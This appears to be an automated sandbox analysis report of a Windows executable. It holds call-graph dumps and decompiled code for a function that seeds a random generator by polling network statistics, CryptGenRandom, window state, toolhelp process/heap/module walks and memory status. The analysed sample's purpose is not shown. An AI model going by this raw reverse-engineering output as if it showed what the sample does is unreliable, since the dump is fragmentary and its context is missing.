2d0490 26 API calls 39815->39816 39817 2deb9a 39816->39817 39818 2d0420 26 API calls 39817->39818 39819 2deba5 39818->39819 39820 3795d0 26 API calls 39819->39820 39821 2debcd 39820->39821 39822 2de310 28 API calls 39821->39822 39823 2debe2 39822->39823 39824 2d0490 26 API calls 39823->39824 39825 2debee 39824->39825 39826 2d0420 26 API calls 39825->39826 39827 2debf9 39826->39827 39828 3795d0 26 API calls 39827->39828 39829 2dec21 39828->39829 39830 2de570 28 API calls 39829->39830 39831 2dec2c 39830->39831 39832 2d0490 26 API calls 39831->39832 39833 2dec38 39832->39833 39834 2d0420 26 API calls 39833->39834 39835 2dec43 39834->39835 39836 3795d0 26 API calls 39835->39836 39837 2dec6b 39836->39837 39838 2ddc90 50 API calls 39837->39838 39839 2dec76 39838->39839 39840 2d0490 26 API calls 39839->39840 39841 2dec82 39840->39841 39842 2d0420 26 API calls 39841->39842 39843 2dec8d 39842->39843 39844 3795d0 26 API calls 39843->39844 39845 2decb5 39844->39845 39846 2de4e0 27 API calls 39845->39846 39847 2decc0 39846->39847 39848 2d0490 26 API calls 39847->39848 39849 2deccc 39848->39849 39850 2d0420 26 API calls 39849->39850 39851 2decd7 39850->39851 39852 3795d0 26 API calls 39851->39852 39853 2ded23 39852->39853 39854 2de4a0 27 API calls 39853->39854 39855 2ded2e 39854->39855 39856 2d0490 26 API calls 39855->39856 39857 2ded3a 39856->39857 39858 2d0420 26 API calls 39857->39858 39859 2ded45 39858->39859 39860 3795d0 26 API calls 39859->39860 39861 2ded6d 39860->39861 39862 2de460 27 API calls 39861->39862 39863 2ded78 39862->39863 39864 2d0490 26 API calls 39863->39864 39865 2ded84 39864->39865 39866 2d0420 26 API calls 39865->39866 39867 2ded8f 39866->39867 39868 3795d0 26 API calls 39867->39868 39869 2dedb7 39868->39869 39870 2d8920 42 API calls 39869->39870 39871 2deded 39870->39871 39872 3802fe ___std_exception_copy 26 API calls 39871->39872 39873 2dee03 39872->39873 39874 379270 26 API calls 39873->39874 39875 2dee1f 39874->39875 39877 3794d0 93 API calls 39875->39877 39881 2dee71 39875->39881 39876 2d0420 26 API calls 39878 2deeb9 39876->39878 39877->39881 39879 2e056d CatchGuardHandler 5 API calls 39878->39879 39880 2deede 39879->39880 39880->39650 39881->39876 39882->39650 39884 37927b 39883->39884 39885 379282 ___std_exception_copy ___scrt_fastfail 39883->39885 39884->39650 39886 379299 39885->39886 39906 37a940 26 API calls 2 library calls 39885->39906 39886->39650 39888 379302 39888->39650 39889 3792ca 39889->39888 39890 37a830 26 API calls 39889->39890 39890->39889 39892 37a4c0 45 API calls 39891->39892 39894 37951b ___std_exception_copy ___scrt_fastfail 39892->39894 39893 2e056d CatchGuardHandler 5 API calls 39895 3795cc 39893->39895 39896 37abf0 6 API calls 39894->39896 39904 379595 ___InternalCxxFrameHandler 39894->39904 39895->39650 39897 379554 39896->39897 39907 37b9d0 39897->39907 39899 379576 39900 379599 39899->39900 39901 37957a 39899->39901 39934 37a720 10 API calls 39900->39934 39933 37a720 10 API calls 39901->39933 39904->39893 39906->39889 39908 37ba2a ___std_exception_copy 39907->39908 39909 37ba33 39908->39909 39912 37ba46 ___std_exception_copy 39908->39912 39910 2e056d CatchGuardHandler 5 API calls 39909->39910 39911 37ba40 39910->39911 39911->39899 39913 37ba7c 39912->39913 39914 37ba9a ___scrt_fastfail 39912->39914 39916 2e056d CatchGuardHandler 5 API calls 39913->39916 39915 37a830 26 API calls 39914->39915 39917 37bab4 39915->39917 39918 37ba94 39916->39918 39935 3798f0 39917->39935 39918->39899 39920 37bac1 ___scrt_fastfail 39921 37bade wsprintfA 39920->39921 39922 37bb10 __fread_nolock ___scrt_fastfail 39921->39922 39923 37b7e0 62 API calls 39922->39923 39924 37bb6b 39923->39924 39925 37bb93 39924->39925 39927 37bb6f 39924->39927 39926 379680 5 API calls 39925->39926 39929 37bbb6 39926->39929 39928 2e056d CatchGuardHandler 5 API calls 39927->39928 39930 37bb8d 39928->39930 39931 2e056d CatchGuardHandler 5 API calls 39929->39931 39930->39899 39932 37bbd4 39931->39932 39932->39899 39933->39904 39934->39904 39936 379924 39935->39936 39937 379be0 5 API calls 39936->39937 39938 37995b 39937->39938 39939 37998a 39938->39939 39943 3799a0 5 API calls CatchGuardHandler 39938->39943 39940 2e056d CatchGuardHandler 5 API calls 39939->39940 39941 379997 39940->39941 39941->39920 39943->39938 39944->39670 37078 346420 37160 397c10 37078->37160 37081 3464f2 37083 346592 37081->37083 37086 346502 NetStatisticsGet 37081->37086 37082 3464c9 GetProcAddress GetProcAddress 37082->37081 37084 3465b2 37083->37084 37085 3465ab FreeLibrary 37083->37085 37087 3465b6 GetProcAddress GetProcAddress GetProcAddress 37084->37087 37110 3465e4 __except_handler4 37084->37110 37085->37084 37088 346550 NetStatisticsGet 37086->37088 37089 34651a __except_handler4 37086->37089 37087->37110 37088->37083 37090 34656e __except_handler4 37088->37090 37094 303850 64 API calls 37089->37094 37097 303850 64 API calls 37090->37097 37091 3466c5 37092 346721 37091->37092 37093 34671a FreeLibrary 37091->37093 37162 2ed120 37092->37162 37093->37092 37096 346541 37094->37096 37096->37088 37097->37083 37098 346726 37099 34672e LoadLibraryA 37098->37099 37100 346829 37098->37100 37099->37100 37103 346743 GetProcAddress GetProcAddress GetProcAddress 37099->37103 37101 346836 12 API calls 37100->37101 37102 346d0d 37100->37102 37104 346d01 FreeLibrary 37101->37104 37105 346921 37101->37105 37189 346da0 37102->37189 37111 34679f __except_handler4 37103->37111 37113 346777 __except_handler4 37103->37113 37104->37102 37105->37104 37127 346999 CreateToolhelp32Snapshot 37105->37127 37108 346822 FreeLibrary 37108->37100 37109 346d29 __except_handler4 37112 303850 64 API calls 37109->37112 37110->37091 37114 303850 64 API calls 37110->37114 37121 346654 __except_handler4 37110->37121 37115 3467e0 __except_handler4 37111->37115 37120 303850 64 API calls 37111->37120 37116 346d44 GetCurrentProcessId 37112->37116 37117 303850 64 API calls 37113->37117 37114->37121 37115->37108 37119 303850 64 API calls 37115->37119 37118 346d5d __except_handler4 37116->37118 37117->37111 37123 303850 64 API calls 37118->37123 37122 34681f 37119->37122 37120->37115 37121->37091 37124 303850 64 API calls 37121->37124 37122->37108 37125 346d78 37123->37125 37124->37091 37126 2e056d CatchGuardHandler 5 API calls 37125->37126 37129 346d98 37126->37129 37127->37104 37128 3469b0 37127->37128 37130 3469d5 Heap32ListFirst 37128->37130 37131 3469cd GetTickCount 37128->37131 37132 346b43 37130->37132 37136 3469e8 __except_handler4 37130->37136 37131->37130 37133 346b56 GetTickCount 37132->37133 37134 346b5c 37132->37134 37135 346b62 Process32First 37133->37135 37134->37135 37137 346bd7 37135->37137 37142 346b79 __except_handler4 37135->37142 37136->37132 37144 346b0f Heap32ListNext 37136->37144 37147 346b2c GetTickCount 37136->37147 37148 303850 64 API calls 37136->37148 37155 346ab6 GetTickCount 37136->37155 37183 303850 37136->37183 37139 346bee __except_handler4 37137->37139 37140 346bea GetTickCount 37137->37140 37145 346c5c 37139->37145 37149 303850 64 API calls 37139->37149 37157 346c51 GetTickCount 37139->37157 37140->37139 37141 346a16 Heap32First 37141->37136 37142->37137 37143 303850 64 API calls 37142->37143 37154 346bcc GetTickCount 37142->37154 37143->37142 37144->37132 37144->37136 37146 346c6f GetTickCount 37145->37146 37156 346c73 __except_handler4 37145->37156 37146->37156 37147->37132 37147->37136 37151 346a99 Heap32Next 37148->37151 37149->37139 37150 346ce7 37152 346cf7 37150->37152 37153 346cfb CloseHandle 37150->37153 37151->37136 37152->37104 37153->37104 37154->37137 37154->37142 37155->37136 37156->37150 37158 303850 64 API calls 37156->37158 37159 346cdc GetTickCount 37156->37159 37157->37139 37157->37145 37158->37156 37159->37150 37159->37156 37161 346443 LoadLibraryA LoadLibraryA LoadLibraryA 37160->37161 37161->37081 37161->37082 37163 2ed12d __except_handler4 37162->37163 37164 2ed146 GetModuleHandleA 37163->37164 37165 2ed225 37163->37165 37166 2ed164 37164->37166 37167 2ed151 GetProcAddress 37164->37167 37168 2ed22e 37165->37168 37169 2ed17b GetProcessWindowStation 37165->37169 37166->37165 37172 2ed171 37166->37172 37167->37166 37175 2e056d CatchGuardHandler 5 API calls 37168->37175 37170 2ed18b GetUserObjectInformationW 37169->37170 37171 2ed243 37169->37171 37170->37171 37173 2ed1a4 GetLastError 37170->37173 37174 2e056d CatchGuardHandler 5 API calls 37171->37174 37172->37169 37173->37171 37176 2ed1b3 __except_handler4 37173->37176 37177 2ed255 37174->37177 37178 2ed23f 37175->37178 37176->37171 37179 2ed1d1 GetUserObjectInformationW 37176->37179 37177->37098 37178->37098 37179->37171 37180 2ed1e9 _wcsstr 37179->37180 37181 2e056d CatchGuardHandler 5 API calls 37180->37181 37182 2ed221 37181->37182 37182->37098 37184 303859 37183->37184 37186 30387d __except_handler4 37183->37186 37201 327e60 64 API calls __except_handler4 37184->37201 37186->37141 37187 30385f 37187->37186 37202 2f72d0 64 API calls __except_handler4 37187->37202 37190 346daa __except_handler4 37189->37190 37191 346df3 GetTickCount 37190->37191 37192 346db3 QueryPerformanceCounter 37190->37192 37193 346e06 __except_handler4 37191->37193 37194 346dc2 37192->37194 37195 346dc9 __except_handler4 37192->37195 37196 303850 64 API calls 37193->37196 37194->37191 37198 303850 64 API calls 37195->37198 37197 346e1a 37196->37197 37199 346d12 GlobalMemoryStatus 37197->37199 37200 346de7 37198->37200 37199->37109 37200->37191 37200->37199 37201->37187 37202->37186 37203 38ca0e GetStartupInfoW 37204 38ca2b 37203->37204 37205 38cabd 37203->37205 37204->37205 37209 390a57 37204->37209 37207 38ca54 37207->37205 37208 38ca82 GetFileType 37207->37208 37208->37207 37210 390a63 ___FrameUnwindToState 37209->37210 37211 390a70 37210->37211 37212 390a87 37210->37212 37230 380e9e 37211->37230 37222 38f6b6 RtlEnterCriticalSection 37212->37222 37216 390a93 37221 390abf 37216->37221 37223 3909a8 37216->37223 37218 390a7f ___FrameUnwindToState 37218->37207 37234 390ae6 RtlLeaveCriticalSection _abort 37221->37234 37222->37216 37235 38b987 37223->37235 37225 3909ba 37229 3909c7 37225->37229 37242 38dd29 11 API calls 2 library calls 37225->37242 37228 390a19 37228->37216 37243 38b8ff 37229->37243 37250 38bdda 20 API calls 2 library calls 37230->37250 37232 380ea3 37233 37f971 26 API calls __wsopen_s 37232->37233 37233->37218 37234->37218 37236 38b994 __dosmaperr 37235->37236 37237 38b9d4 37236->37237 37238 38b9bf RtlAllocateHeap 37236->37238 37249 383a6d 7 API calls 2 library calls 37236->37249 37240 380e9e __dosmaperr 19 API calls 37237->37240 37238->37236 37239 38b9d2 37238->37239 37239->37225 37240->37239 37242->37225 37244 38b90a RtlFreeHeap 37243->37244 37245 38b933 __dosmaperr 37243->37245 37244->37245 37246 38b91f 37244->37246 37245->37228 37247 380e9e __dosmaperr 18 API calls 37246->37247 37248 38b925 GetLastError 37247->37248 37248->37245 37249->37236 37250->37232 37049 2e064c 37050 2e0655 37049->37050 37060 2e0d00 IsProcessorFeaturePresent 37050->37060 37052 2e0661 37061 37dfa7 10 API calls 4 library calls 37052->37061 37054 2e0666 37059 2e066a 37054->37059 37062 3849c5 37054->37062 37057 2e0681 37060->37052 37061->37054 37066 3908d8 37062->37066 37065 37dfd0 8 API calls 3 library calls 37065->37059 37069 3908f1 37066->37069 37068 2e0673 37068->37057 37068->37065 37070 2e056d 37069->37070 37071 2e0578 IsProcessorFeaturePresent 37070->37071 37072 2e0576 37070->37072 37074 2e08ad 37071->37074 37072->37068 37077 2e0871 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37074->37077 37076 2e0990 37076->37068 37077->37076 37251 390845 37252 390850 37251->37252 37253 390878 37252->37253 37254 390869 37252->37254 37255 390887 37253->37255 37272 3954a3 27 API calls 2 library calls 37253->37272 37257 380e9e __dosmaperr 20 API calls 37254->37257 37260 391b1a 37255->37260 37259 39086e ___scrt_fastfail 37257->37259 37261 391b32 37260->37261 37262 391b27 37260->37262 37264 391b3a 37261->37264 37270 391b43 __dosmaperr 37261->37270 37273 38b939 37262->37273 37265 38b8ff _unexpected 20 API calls 37264->37265 37268 391b2f 37265->37268 37266 391b48 37269 380e9e __dosmaperr 20 API calls 37266->37269 37267 391b6d RtlReAllocateHeap 37267->37268 37267->37270 37268->37259 37269->37268 37270->37266 37270->37267 37280 383a6d 7 API calls 2 library calls 37270->37280 37272->37255 37274 38b977 37273->37274 37279 38b947 __dosmaperr 37273->37279 37275 380e9e __dosmaperr 20 API calls 37274->37275 37277 38b975 37275->37277 37276 38b962 RtlAllocateHeap 37276->37277 37276->37279 37277->37268 37279->37274 37279->37276 37281 383a6d 7 API calls 2 library calls 37279->37281 37280->37270 37281->37279

                        Executed Functions

                        Function 00346420 Relevance: 133.6, APIs: 48, Strings: 28, Instructions: 581libraryloadermemoryCOMMONCrypto
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 346420-3464c7 call 397c10 LoadLibraryA * 3 3 3464f2-3464f4 0->3 4 3464c9-3464ec GetProcAddress * 2 0->4 5 3465a1-3465a9 3->5 6 3464fa-3464fc 3->6 4->3 7 3465b2-3465b4 5->7 8 3465ab-3465ac FreeLibrary 5->8 6->5 9 346502-346518 NetStatisticsGet 6->9 10 3465e4 7->10 11 3465b6-3465e2 GetProcAddress * 3 7->11 8->7 12 346550-34656c NetStatisticsGet 9->12 13 34651a-346544 call 397c10 call 303850 9->13 14 3465e6-3465ee 10->14 11->14 12->5 16 34656e-346595 call 397c10 call 303850 12->16 13->12 18 3465f4-3465fb 14->18 19 3466e0-346718 14->19 16->5 18->19 24 346601-346603 18->24 21 346721-346728 call 2ed120 19->21 22 34671a-34671b FreeLibrary 19->22 32 34672e-34673d LoadLibraryA 21->32 33 346829-346830 21->33 22->21 24->19 28 346609-34661f 24->28 38 346621-346635 28->38 39 34666f-346681 28->39 32->33 37 346743-346775 GetProcAddress * 3 32->37 35 346836-34691b GetProcAddress * 12 33->35 36 346d0d-346d24 call 346da0 GlobalMemoryStatus call 397c10 33->36 40 346d01-346d07 FreeLibrary 35->40 41 346921-346928 35->41 62 346d29-346d9b call 303850 GetCurrentProcessId call 397c10 call 303850 call 2e056d 36->62 43 346777 37->43 44 3467a2-3467aa 37->44 57 346637-346657 call 397c10 call 303850 38->57 58 346661-346663 38->58 48 346689-34668b 39->48 40->36 41->40 47 34692e-346935 41->47 56 346779-34679f call 397c10 call 303850 43->56 45 3467e3-3467eb 44->45 46 3467ac-3467bb 44->46 53 346822-346823 FreeLibrary 45->53 54 3467ed-34681f call 397c10 call 303850 45->54 46->45 65 3467bd-3467e0 call 397c10 call 303850 46->65 47->40 51 34693b-34693d 47->51 48->19 52 34668d-3466a1 48->52 51->40 61 346943-34694a 51->61 74 3466d2-3466d4 52->74 75 3466a3-3466c8 call 397c10 call 303850 52->75 53->33 54->53 56->44 57->58 58->39 61->40 66 346950-346957 61->66 65->45 66->40 73 34695d-346964 66->73 73->40 83 34696a-346971 73->83 74->19 75->74 83->40 89 346977-34697e 83->89 89->40 94 346984-34698b 89->94 94->40 98 346991-346993 94->98 98->40 100 346999-3469aa CreateToolhelp32Snapshot 98->100 100->40 101 3469b0-3469cb 100->101 103 3469d5-3469e2 Heap32ListFirst 101->103 104 3469cd-3469cf GetTickCount 101->104 105 346b43-346b54 103->105 106 3469e8-3469ed 103->106 104->103 108 346b56-346b5a GetTickCount 105->108 109 346b5c 105->109 107 3469f3-346a5b call 397c10 call 303850 Heap32First 106->107 121 346ad6-346b21 Heap32ListNext 107->121 122 346a5d-346a68 107->122 111 346b62-346b77 Process32First 108->111 109->111 113 346bd7-346be8 111->113 114 346b79 111->114 116 346bee-346c03 113->116 117 346bea-346bec GetTickCount 113->117 118 346b80-346bc1 call 397c10 call 303850 114->118 128 346c05-346c46 call 397c10 call 303850 116->128 129 346c5c-346c6d 116->129 117->116 118->113 144 346bc3-346bca 118->144 121->105 131 346b23-346b2a 121->131 127 346a70-346aab call 397c10 call 303850 Heap32Next 122->127 153 346ad0 127->153 154 346aad-346ab4 127->154 128->129 159 346c48-346c4f 128->159 132 346c73-346c88 129->132 133 346c6f-346c71 GetTickCount 129->133 136 346b2c-346b39 GetTickCount 131->136 137 346b3b-346b3d 131->137 145 346ce7-346cf5 132->145 146 346c8a 132->146 133->132 136->105 136->137 137->105 137->107 144->118 151 346bcc-346bd5 GetTickCount 144->151 149 346cf7-346cf9 145->149 150 346cfb CloseHandle 145->150 152 346c90-346cd1 call 397c10 call 303850 146->152 149->40 150->40 151->113 151->118 152->145 166 346cd3-346cda 152->166 153->121 155 346ac5-346ace 154->155 156 346ab6-346ac3 GetTickCount 154->156 155->127 155->153 156->153 156->155 159->128 162 346c51-346c5a GetTickCount 159->162 162->128 162->129 166->152 167 346cdc-346ce5 GetTickCount 166->167 167->145 167->152
                        C-Code - Quality: 43%
                        			E00346420(void* __ebx, void* __edi) {
				int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v96;
				int _v104;
				int _v108;
				void* _v112;
				char _v116;
				char _v144;
				struct _MEMORYSTATUS _v176;
				void* _v472;
				char _v1020;
				void* _v1024;
				void* _v1028;
				struct HINSTANCE__* _v1032;
				_Unknown_base(*)()* _v1036;
				int _v1040;
				int _v1044;
				_Unknown_base(*)()* _v1048;
				_Unknown_base(*)()* _v1052;
				_Unknown_base(*)()* _v1056;
				void* _v1060;
				_Unknown_base(*)()* _v1064;
				_Unknown_base(*)()* _v1068;
				_Unknown_base(*)()* _v1072;
				char _v1076;
				_Unknown_base(*)()* _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr* _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				int _v1132;
				void* _v1164;
				void* __esi;
				signed int _t181;
				signed int _t182;
				struct HINSTANCE__* _t186;
				struct HINSTANCE__* _t187;
				intOrPtr* _t188;
				int _t189;
				void* _t190;
				void* _t216;
				intOrPtr* _t225;
				intOrPtr* _t273;
				intOrPtr* _t274;
				intOrPtr* _t275;
				char _t285;
				void* _t290;
				void* _t292;
				void* _t313;
				_Unknown_base(*)()* _t321;
				_Unknown_base(*)()* _t324;
				_Unknown_base(*)()* _t325;
				_Unknown_base(*)()* _t330;
				_Unknown_base(*)()* _t334;
				intOrPtr _t337;
				struct HINSTANCE__* _t340;
				void* _t341;
				struct HINSTANCE__* _t343;
				_Unknown_base(*)()* _t344;
				void* _t345;
				long _t346;
				intOrPtr _t347;
				intOrPtr _t348;
				struct HINSTANCE__* _t349;
				signed int _t350;
				void* _t351;
				intOrPtr _t352;

				_push(0xfffffffe);
				_push(0x3df280);
				_push(E0037E030);
				_push( *[fs:0x0]);
				_t352 = _t351 - 8;
				E00397C10();
				_t181 =  *0x3e1008; // 0x847b54ee
				_v12 = _v12 ^ _t181;
				_t182 = _t181 ^ _t350;
				_v32 = _t182;
				_push(__edi);
				_push(_t182);
				 *[fs:0x0] =  &_v20;
				_v28 = _t352;
				_v1040 = 0;
				_v1044 = 0;
				_t340 = LoadLibraryA("ADVAPI32.DLL");
				_v1032 = LoadLibraryA("KERNEL32.DLL");
				_t186 = LoadLibraryA("NETAPI32.DLL"); // executed
				_v1064 = _t186;
				_t324 = 0;
				_v1056 = 0;
				_v1028 = 0;
				_v1036 = 0;
				_v1048 = 0;
				_t334 = 0;
				_v1052 = 0;
				_t337 =  *0x39e0c8;
				if(_t186 != 0) {
					_v1048 = GetProcAddress(_t186, "NetStatisticsGet");
					_t321 = GetProcAddress(_v1064, "NetApiBufferFree"); // executed
					_t334 = _t321;
					_v1052 = _t334;
					_t324 = _v1048;
				}
				if(_t324 != 0 && _t334 != 0) {
					_t313 =  *_v1048(0, L"LanmanServer", 0, 0,  &_v1024); // executed
					if(_t313 == 0) {
						E00397C10();
						asm("movsd xmm0, [0x3c57d8]");
						asm("movsd [esp], xmm0");
						E00303850(_t337, _v1024, 0x44);
						_t352 = _t352 + 0x10;
						_v1052(_v1024);
					}
				}
				_t187 = _v1064;
				if(_t187 != 0) {
					FreeLibrary(_t187); // executed
				}
				if(_t340 == 0) {
					_t325 = 0;
				} else {
					_v1056 = GetProcAddress(_t340, "CryptAcquireContextW");
					_v1028 = GetProcAddress(_t340, "CryptGenRandom");
					_t325 = GetProcAddress(_t340, "CryptReleaseContext");
					_v1036 = _t325;
				}
				_t188 = _v1056;
				if(_t188 != 0 && _v1028 != 0 && _t325 != 0) {
					_t290 =  *_t188( &_v1040, 0, 0, 1, 0xf0000000); // executed
					if(_t290 != 0) {
						_push( &_v96);
						_push(0x40);
						_push(_v1040);
						if(_v1028() != 0) {
							E00397C10();
							asm("xorps xmm0, xmm0");
							asm("movsd [esp], xmm0");
							E00303850(_t337,  &_v96, 0x40);
							_t352 = _t352 + 0x10;
							_v1044 = 1;
						}
						_v1036(_v1040, 0);
					}
					_t292 =  *_v1056( &_v1040, 0, L"Intel Hardware Cryptographic Service Provider", 0x16, 0); // executed
					if(_t292 != 0) {
						_push( &_v96);
						_push(0x40);
						_push(_v1040);
						if(_v1028() != 0) {
							E00397C10();
							asm("movsd xmm0, [0x3c57e8]");
							asm("movsd [esp], xmm0");
							E00303850(_t337,  &_v96, 0x40);
							_t352 = _t352 + 0x10;
							_v1044 = 1;
						}
						_v1036(_v1040, 0);
					}
				}
				_t189 = _v1044;
				_v1084 = _t189;
				_v1108 = _t189;
				_v1104 = _t189;
				_v1100 = _t189;
				_v1096 = _t189;
				_v1092 = _t189;
				_v1088 = _t189;
				_v1120 = _t189;
				if(_t340 != 0) {
					FreeLibrary(_t340); // executed
				}
				_t190 = E002ED120(_t337); // executed
				if(_t190 == 0) {
					_t349 = LoadLibraryA("USER32.DLL");
					if(_t349 != 0) {
						_v1060 = GetProcAddress(_t349, "GetForegroundWindow");
						_v1068 = GetProcAddress(_t349, "GetCursorInfo");
						_v1072 = GetProcAddress(_t349, "GetQueueStatus");
						_t273 = _v1060;
						if(_t273 != 0) {
							_t285 =  *_t273(); // executed
							_v1060 = _t285;
							E00397C10();
							asm("xorps xmm0, xmm0");
							asm("movsd [esp], xmm0");
							E00303850(_t337,  &_v1060, 4);
							_t352 = _t352 + 0x10;
						}
						_t274 = _v1068;
						if(_t274 != 0) {
							_v116 = 0x14;
							_push( &_v116);
							if( *_t274() != 0) {
								E00397C10();
								asm("movsd xmm0, [0x3c57b0]");
								asm("movsd [esp], xmm0");
								E00303850(_t337,  &_v116, _v116);
								_t352 = _t352 + 0x10;
							}
						}
						_t275 = _v1072;
						if(_t275 != 0) {
							_v1076 =  *_t275(0xbf);
							E00397C10();
							asm("movsd xmm0, [0x3b1f80]");
							asm("movsd [esp], xmm0");
							E00303850(_t337,  &_v1076, 4);
							_t352 = _t352 + 0x10;
						}
						FreeLibrary(_t349);
					}
				}
				if(_v1032 == 0) {
					L90:
					E00346DA0();
					GlobalMemoryStatus( &_v176); // executed
					E00397C10();
					asm("movsd xmm0, [0x3b1f80]");
					asm("movsd [esp], xmm0");
					E00303850(_t337,  &_v176, 0x20);
					_v1076 = GetCurrentProcessId();
					E00397C10();
					asm("movsd xmm0, [0x3b1f80]");
					asm("movsd [esp], xmm0");
					E00303850(_t337,  &_v1076, 4);
					 *[fs:0x0] = _v20;
					_pop(_t341);
					return E002E056D(_v32 ^ _t350, _t334, _t341);
				} else {
					_v1028 = 0;
					_t343 = _v1032;
					_v1036 = GetProcAddress(_t343, "CreateToolhelp32Snapshot");
					_v1116 = GetProcAddress(_t343, "CloseToolhelp32Snapshot");
					_v1064 = GetProcAddress(_t343, "Heap32First");
					_v1056 = GetProcAddress(_t343, "Heap32Next");
					_t344 = GetProcAddress(_t343, "Heap32ListFirst");
					_v1124 = _t344;
					_v1052 = GetProcAddress(_v1032, "Heap32ListNext");
					_v1048 = GetProcAddress(_v1032, "Process32First");
					_v1080 = GetProcAddress(_v1032, "Process32Next");
					_v1072 = GetProcAddress(_v1032, "Thread32First");
					_v1068 = GetProcAddress(_v1032, "Thread32Next");
					_v1060 = GetProcAddress(_v1032, "Module32First");
					_t330 = GetProcAddress(_v1032, "Module32Next");
					_v1112 = _t330;
					if(_v1036 == 0 || _v1064 == 0 || _v1056 == 0 || _t344 == 0 || _v1052 == 0 || _v1048 == 0 || _v1080 == 0 || _v1072 == 0 || _v1068 == 0 || _v1060 == 0 || _t330 == 0) {
						L89:
						FreeLibrary(_v1032);
						goto L90;
					} else {
						_t216 = CreateToolhelp32Snapshot(0xf, 0); // executed
						_t345 = _t216;
						_v1024 = _t345;
						if(_t345 == 0xffffffff) {
							goto L89;
						}
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x6c], xmm0");
						_v112 = 0x10;
						_t337 =  *0x39e08c;
						if(_v1044 != 0) {
							_v1028 = GetTickCount();
						}
						if(Heap32ListFirst(_t345,  &_v112) == 0) {
							L65:
							_v472 = 0x128;
							if(_v1092 == 0) {
								_t346 = _v1028;
							} else {
								_t346 = GetTickCount();
							}
							if(Process32First(_v1024,  &_v472) == 0) {
								L73:
								_v144 = 0x1c;
								if(_v1100 != 0) {
									_t346 = GetTickCount();
								}
								_push( &_v144);
								_push(_v1024);
								if(_v1072() == 0) {
									L79:
									_v1020 = 0x224;
									if(_v1108 != 0) {
										_t346 = GetTickCount();
									}
									_push( &_v1020);
									_push(_v1024);
									if(_v1060() == 0) {
										L86:
										_t225 = _v1116;
										_push(_v1024);
										if(_t225 == 0) {
											CloseHandle();
										} else {
											 *_t225();
										}
										goto L89;
									} else {
										asm("o16 nop [eax+eax]");
										do {
											E00397C10();
											asm("movsd xmm0, [0x3c57d0]");
											asm("movsd [esp], xmm0");
											E00303850(_t337,  &_v1020, _v1020);
											_t352 = _t352 + 0x10;
											_push( &_v1020);
											_push(_v1024);
										} while (_v1112() != 0 && (_v1044 == 0 || GetTickCount() - _t346 < 0x3e8));
										goto L86;
									}
								} else {
									do {
										E00397C10();
										asm("movsd xmm0, [0x3c57c8]");
										asm("movsd [esp], xmm0");
										E00303850(_t337,  &_v144, _v144);
										_t352 = _t352 + 0x10;
										_push( &_v144);
										_push(_v1024);
									} while (_v1068() != 0 && (_v1104 == 0 || GetTickCount() - _t346 < 0x3e8));
									goto L79;
								}
							} else {
								do {
									E00397C10();
									asm("movsd xmm0, [0x3c57d0]");
									asm("movsd [esp], xmm0");
									E00303850(_t337,  &_v472, _v472);
									_t352 = _t352 + 0x10;
									_push( &_v472);
									_push(_v1024);
								} while (_v1080() != 0 && (_v1096 == 0 || GetTickCount() - _t346 < 0x3e8));
								goto L73;
							}
						} else {
							_t347 = 0x2a;
							_v1036 = 0x2a;
							do {
								E00397C10();
								asm("movsd xmm0, [0x3c57b8]");
								asm("movsd [esp], xmm0");
								E00303850(_t337,  &_v112, _v112);
								_t352 = _t352 + 0x10;
								asm("wait");
								_v8 = 0;
								asm("xorps xmm0, xmm0");
								asm("movups [ebp-0x488], xmm0");
								asm("movups [ebp-0x478], xmm0");
								_v1132 = 0;
								_v1164 = 0x24;
								if(Heap32First( &_v1164, _v108, _v104) == 0) {
									goto L60;
								}
								_t348 = 0x50;
								_v1128 = 0x50;
								while(1) {
									E00397C10();
									asm("movsd xmm0, [0x3c57c0]");
									asm("movsd [esp], xmm0");
									E00303850(_t337,  &_v1164, _v1164);
									_t352 = _t352 + 0x10;
									if(Heap32Next( &_v1164) == 0 || _v1120 != 0 && GetTickCount() - _v1028 >= 0x3e8) {
										break;
									}
									_t348 = _t348 - 1;
									_v1128 = _t348;
									if(_t348 > 0) {
										continue;
									}
									break;
								}
								_t347 = _v1036;
								L60:
								asm("wait");
								_v8 = 0xfffffffe;
							} while (Heap32ListNext(_v1024,  &_v112) != 0 && (_v1088 == 0 || GetTickCount() - _v1028 < 0x3e8) && _t347 > 0);
							goto L65;
						}
					}
				}
			}

















































































                        0x00346423
                        0x00346425
                        0x0034642a
                        0x00346435
                        0x00346436
                        0x0034643e
                        0x00346443
                        0x00346448
                        0x0034644b
                        0x0034644d
                        0x00346452
                        0x00346453
                        0x00346457
                        0x0034645d
                        0x00346460
                        0x0034646a
                        0x00346481
                        0x0034648a
                        0x00346495
                        0x00346497
                        0x0034649d
                        0x0034649f
                        0x003464a5
                        0x003464ab
                        0x003464b1
                        0x003464b7
                        0x003464b9
                        0x003464bf
                        0x003464c7
                        0x003464d1
                        0x003464e2
                        0x003464e4
                        0x003464e6
                        0x003464ec
                        0x003464ec
                        0x003464f4
                        0x00346568
                        0x0034656c
                        0x00346573
                        0x00346578
                        0x00346580
                        0x0034658d
                        0x00346592
                        0x0034659b
                        0x0034659b
                        0x0034656c
                        0x003465a1
                        0x003465a9
                        0x003465ac
                        0x003465ac
                        0x003465b4
                        0x003465e4
                        0x003465b6
                        0x003465be
                        0x003465cc
                        0x003465da
                        0x003465dc
                        0x003465dc
                        0x003465e6
                        0x003465ee
                        0x0034661b
                        0x0034661f
                        0x00346624
                        0x00346625
                        0x00346627
                        0x00346635
                        0x0034663c
                        0x00346641
                        0x00346644
                        0x0034664f
                        0x00346654
                        0x00346657
                        0x00346657
                        0x00346669
                        0x00346669
                        0x00346687
                        0x0034668b
                        0x00346690
                        0x00346691
                        0x00346693
                        0x003466a1
                        0x003466a8
                        0x003466ad
                        0x003466b5
                        0x003466c0
                        0x003466c5
                        0x003466c8
                        0x003466c8
                        0x003466da
                        0x003466da
                        0x0034668b
                        0x003466e0
                        0x003466e6
                        0x003466ec
                        0x003466f2
                        0x003466f8
                        0x003466fe
                        0x00346704
                        0x0034670a
